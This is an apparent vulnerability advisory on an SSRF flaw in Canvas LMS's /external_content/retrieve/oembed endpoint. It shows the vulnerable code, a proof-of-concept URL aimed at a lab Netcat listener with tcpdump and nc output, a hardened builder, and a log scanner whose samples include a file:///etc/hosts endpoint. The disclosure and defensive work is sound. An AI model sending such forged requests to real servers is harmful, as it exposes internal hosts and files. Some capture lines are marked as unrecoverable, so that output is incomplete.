A server-side request forgery (SSRF) vulnerability exists in /external_content/retrieve/oembed. A remote, unauthenticated attacker can exploit it to force the Canvas LMS application to perform HTTP GET requests to arbitrary domains; in other words, the attacker can direct the Canvas application to generate requests to URLs of their choosing.
The flaw lies in the oembed_retrieve endpoint of the external_content_controller: after the request parameters are parsed, they are passed to CanvasHttp.get, which issues an HTTP GET request to whatever the endpoint parameter specifies, with the url parameter carrying arbitrary content.
    def oembed_retrieve
      endpoint = params[:endpoint]
      url = params[:url]
      # The caller-supplied endpoint becomes the base of the outbound request;
      # only the url value is escaped, and nothing checks endpoint's scheme or host
      # before the resulting URI is handed to CanvasHttp.get.
      uri = URI.parse(endpoint + '?url=' + CGI.escape(url) + '&format=json')
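To make the difference concrete, here is an added Ruby example (not Canvas's own code) that places the vulnerable construction from the snippet above next to a hardened version. The hardened builder parses the endpoint first, accepts only http(s) URLs whose host is on an assumed allowlist of oEmbed providers (the two hosts in OEMBED_ENDPOINT_ALLOWLIST are constructed for this example), rejects embedded credentials and non-default ports, and rebuilds the query with the library encoder. A second helper, blocked_address?, is meant to be applied to the address the host actually resolves to just before connecting, so that an allowlisted name pointed at an internal address is still refused. All function and constant names are this example's own assumptions.

```ruby
require 'uri'
require 'cgi'
require 'ipaddr'

# Assumed allowlist of oEmbed provider hosts the application is willing to
# call (constructed for this example; the real provider list is not on the page).
OEMBED_ENDPOINT_ALLOWLIST = %w[www.youtube.com vimeo.com].freeze

# Address ranges an outbound fetch must never reach, even if DNS for an
# allowlisted host is later pointed at them (this-host, RFC 1918, loopback,
# link-local, IPv6 loopback/ULA/link-local).
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12 192.168.0.0/16
  ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

class OembedEndpointRejected < StandardError; end

# The vulnerable construction from the advisory: the caller's endpoint string
# is concatenated into the outbound URL without validation, so whatever host
# and port the caller chooses is where the HTTP client will connect.
def build_oembed_uri_unsafe(endpoint, url)
  URI.parse(endpoint + '?url=' + CGI.escape(url) + '&format=json')
end

# Hardened construction: parse the endpoint first, accept only http(s) URLs
# whose host is a known oEmbed provider on its default port, and build the
# query with the library encoder instead of string concatenation.
def build_oembed_uri_safe(endpoint, url)
  uri = URI.parse(endpoint.to_s)
  unless %w[http https].include?(uri.scheme)
    raise OembedEndpointRejected, "scheme not allowed: #{uri.scheme.inspect}"
  end
  raise OembedEndpointRejected, 'credentials embedded in endpoint' if uri.userinfo
  host = uri.hostname.to_s.downcase
  unless OEMBED_ENDPOINT_ALLOWLIST.include?(host)
    raise OembedEndpointRejected, "host not on oEmbed allowlist: #{host.inspect}"
  end
  unless uri.port == uri.default_port
    raise OembedEndpointRejected, "non-default port #{uri.port} not allowed"
  end
  uri.query = URI.encode_www_form(url: url, format: 'json')
  uri
rescue URI::InvalidURIError => e
  raise OembedEndpointRejected, "unparseable endpoint: #{e.message}"
end

# Defence in depth for the fetch itself: check the address the host resolved
# to before connecting, so an allowlisted name that resolves to an internal
# address is still refused. Anything that is not a usable IP literal is
# treated as blocked rather than guessed at.
def blocked_address?(ip_string)
  ip = IPAddr.new(ip_string)
  BLOCKED_RANGES.any? { |range| range.include?(ip) }
rescue ArgumentError
  true
end

if $PROGRAM_NAME == __FILE__
  # The proof-of-concept input from the advisory, fed to both builders.
  puts build_oembed_uri_unsafe('http://192.168.1.191:4444', 'scooby')
  begin
    build_oembed_uri_safe('http://192.168.1.191:4444', 'scooby')
  rescue OembedEndpointRejected => e
    puts "rejected: #{e.message}"
  end
  puts build_oembed_uri_safe('https://www.youtube.com/oembed', 'scooby')
end
```

With the proof-of-concept input, the unsafe builder yields http://192.168.1.191:4444?url=scooby&format=json (exactly the request seen on the listener below), while the safe builder raises OembedEndpointRejected because the host is not an allowlisted provider. The allowlist check does the real work here; blocked_address? only matters once the fetch layer resolves names itself, and it is the kind of check that must run on the resolved address, not on the hostname, to be of any use against rebinding.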
Below I set up a test scenario as a proof of concept.
Proof of Concept
I hosted the Canvas LMS application and set up a Netcat listener. In addition, I started tcpdump on the Canvas host machine.
After visiting
http://192.168.1.189/external_content/retrieve/oembed?endpoint=http://192.168.1.191:4444&url=scooby
in a web browser, I observed the following tcpdump output:
    bitnami@debian:~$ sudo tcpdump -s0 -X tcp port 4444
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    [SYN from 192.168.1.189.57180 to 192.168.1.191.4444; hex lines not recoverable from the source]
    20:35:37.2197 IP 192.168.1.191.4444 > 192.168.1.189.57180: Flags [S.], seq 38178782, ack 1677789, win 6535, options [mss 1460,nop,wscale 6,nop,nop,TS val 52595089 ecr 3128961787,sackOK,eol], length 0
            [hex lines not recoverable from the source]
    20:35:37.219805 IP 192.168.1.189.57180 > 192.168.1.191.4444: Flags [.], ack 1, win 502, options [nop,nop,TS val 3128961787 ecr 5259089], length 0
            [hex lines not recoverable from the source]
    20:35:37.220048 IP 192.168.1.191.4444 > 192.168.1.189.57180: [flags and options not recoverable from the source]
    20:35:37.22051 IP 192.168.1.189.57180 > 192.168.1.191.4444: Flags [P.], seq 1:176, ack 1, win 502, options [nop,nop,TS val 3128961788 ecr 5259359], length 175
            0x0000:  [hex lines not recoverable from the source]
            0x0030:  1f59 21f1 4745 5420 2f3f 7572 6c3d 7363  .Y!.GET./?url=sc
            0x0040:  6f6f 6279 2666 6f72 6d61 743d 6a73 6f6e  ooby&format=json
            0x0050:  2048 5454 502f 312e 310d 0a41 6363 6570  .HTTP/1.1..Accep
            0x0060:  742d 456e 636f 6469 6e67 3a20 677a 6970  t-Encoding:.gzip
            0x0070:  3b71 3d31 2e30 2c64 6566 6c61 7465 3b71  ;q=1.0,deflate;q
            0x0080:  3d30 2e36 2c69 6465 6e74 6974 793b 713d  =0.6,identity;q=
            0x0090:  302e 330d 0a41 6363 6570 743a 202a 2f2a  0.3..Accept:.*/*
            0x00a0:  0d0a 5573 6572 2d41 6765 6e74 3a20 5275  ..User-Agent:.Ru
            0x00b0:  6279 0d0a 436f 6e6e 6563 7469 6f6e 3a20  by..Connection:.
            0x00c0:  636c 6f73 650d 0a48 6f73 743a 2031 3932  close..Host:.192
            0x00d0:  [hex line not recoverable from the source]
            0x00e0:  0d0a                                     ..
    20:35:37.220841 IP 192.168.1.191.4444 > 192.168.1.189.57180: [flags and options not recoverable from the source]
Notice the HTTP request being sent out over TCP port 4444 to 192.168.1.191.
Below is the output of my Netcat listener:
    sh-3.2$ nc -lv 4444
    GET /?url=scooby&format=json HTTP/1.1
    Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Note that the value of the url parameter is attacker-controlled, which allows an attacker to send a request containing an arbitrary message.
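On the detection side, the request shape shown in the proof of concept is easy to pick out of a web server access log: the oembed path with an endpoint parameter pointing at an IP literal, a non-http scheme, or a host that is not a known oEmbed provider. The following is an added Ruby example, not part of the advisory, that scans common-log-format lines for exactly that. The log lines, the KNOWN_OEMBED_HOSTS allowlist and all function names are constructed for this example; the first sample line reproduces the advisory's proof-of-concept request.

```ruby
require 'uri'
require 'cgi'
require 'ipaddr'

OEMBED_PATH = '/external_content/retrieve/oembed'

# Assumed allowlist of legitimate oEmbed provider hosts (constructed for this
# example); any other endpoint host in the logs is worth a closer look.
KNOWN_OEMBED_HOSTS = %w[www.youtube.com vimeo.com].freeze

# Common-log-format request line: source address, timestamp, method, target, status.
ACCESS_LINE = /\A(?<src>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample lines; the first reproduces the advisory's proof of concept.
SAMPLE_ACCESS_LOG = [
  '192.168.1.10 - - [01/Jan/2024:20:35:37 +0000] "GET /external_content/retrieve/oembed?endpoint=http://192.168.1.191:4444&url=scooby HTTP/1.1" 200 2',
  '192.168.1.10 - - [01/Jan/2024:20:35:40 +0000] "GET /external_content/retrieve/oembed?endpoint=https%3A%2F%2Fwww.youtube.com%2Foembed&url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dabc HTTP/1.1" 200 412',
  '10.0.0.5 - - [01/Jan/2024:20:35:41 +0000] "GET /courses/1 HTTP/1.1" 200 1234',
  '192.168.1.10 - - [01/Jan/2024:20:35:44 +0000] "GET /external_content/retrieve/oembed?endpoint=http://unknown-provider.example/oembed&url=x HTTP/1.1" 200 2',
  '192.168.1.10 - - [01/Jan/2024:20:35:45 +0000] "GET /external_content/retrieve/oembed?endpoint=file:///etc/hosts&url=x HTTP/1.1" 200 2',
].freeze

# True when the host portion is a bare IPv4/IPv6 literal rather than a name.
def ip_literal?(host)
  IPAddr.new(host)
  true
rescue ArgumentError
  false
end

# Returns nil for lines that are not oEmbed retrievals or whose endpoint looks
# legitimate, otherwise a hash describing why the line is suspicious.
def suspicious_oembed_request(line)
  m = ACCESS_LINE.match(line)
  return nil unless m

  begin
    target = URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil
  end
  return nil unless target.path == OEMBED_PATH

  # CGI.parse percent-decodes, so encoded and raw endpoint values look the same here.
  endpoint = CGI.parse(target.query.to_s)['endpoint'].first
  return nil if endpoint.nil?

  reason =
    begin
      ep = URI.parse(endpoint)
      host = ep.hostname.to_s.downcase
      if !%w[http https].include?(ep.scheme)
        "endpoint uses non-http scheme #{ep.scheme.inspect}"
      elsif ip_literal?(host)
        "endpoint host is an IP literal (#{host})"
      elsif !KNOWN_OEMBED_HOSTS.include?(host)
        "endpoint host #{host.inspect} is not a known oEmbed provider"
      end
    rescue URI::InvalidURIError
      'endpoint is not a parseable URL'
    end
  return nil if reason.nil?

  { src: m[:src], time: m[:time], endpoint: endpoint, reason: reason }
end

# Runs the check over every line and keeps only the flagged ones.
def scan_access_log(lines)
  lines.map { |line| suspicious_oembed_request(line) }.compact
end

if $PROGRAM_NAME == __FILE__
  scan_access_log(SAMPLE_ACCESS_LOG).each do |hit|
    puts "#{hit[:time]} #{hit[:src]} -> #{hit[:endpoint]}: #{hit[:reason]}"
  end
end
```

Run over the sample lines, the scanner flags the proof-of-concept request (IP-literal endpoint), the unknown provider and the file: scheme, and passes the YouTube request and the unrelated course page. In a real deployment the same logic belongs on whatever already parses the access log, and the allowlist should be the same one the application enforces, so that a flagged line means a request the fix would also have refused.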